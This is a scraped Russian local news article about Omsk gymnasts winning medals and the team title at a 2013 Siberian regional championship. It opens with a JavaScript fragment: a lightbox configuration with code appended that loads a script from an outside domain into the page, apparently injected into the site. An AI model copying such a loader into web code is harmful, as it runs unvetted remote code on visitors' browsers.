, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
4 февраля, 2013 Спорт

Омские гимнастки завоевали пять медалей

Одну золотую, две серебряные и столько же бронзовых медалей привезли омички с чемпионата Сибирского федерального округа по спортивной гимнастике. Также наша сборная подтвердила титул действующего победителя чемпионата СФО.

В Красноярске завершился чемпионат Сибирского федерального округа по спортивной гимнастике. Девушки выступали как в личном, так и командном зачетах. Омск представляли кандидаты в мастера спорта Анастасия Антуфьева, Ульяна Налепова, Алена Недовба, Светлана Жернова, Евгения Литвин и мастер спорта Ольга Тё. Их соперницами стали гимнастки из Красноярского и Алтайского краев, Новосибирской, Томской, Иркутской областей.

Как рассказали корреспонденту «Обозревателя» в пресс-службе министерства спорта, в командном зачете наша сборная взошла на первую ступень пьедестала почета, подтвердив титул действующего победителя чемпионата Сибирского федерального округа.

Итог выступлений в личном зачете оказался следующим. В опорном прыжке лучший результат показала омичка Светлана Жернова, ей уступила другая наша землячка Ольга Тё. В соревнованиях на бревне Тё стала второй, а Жернова – третьей. В этом виде упражнений первенствовала Екатерина Штронда из Красноярского края. В вольных упражнениях Ольга Тё завоевала бронзовую медаль.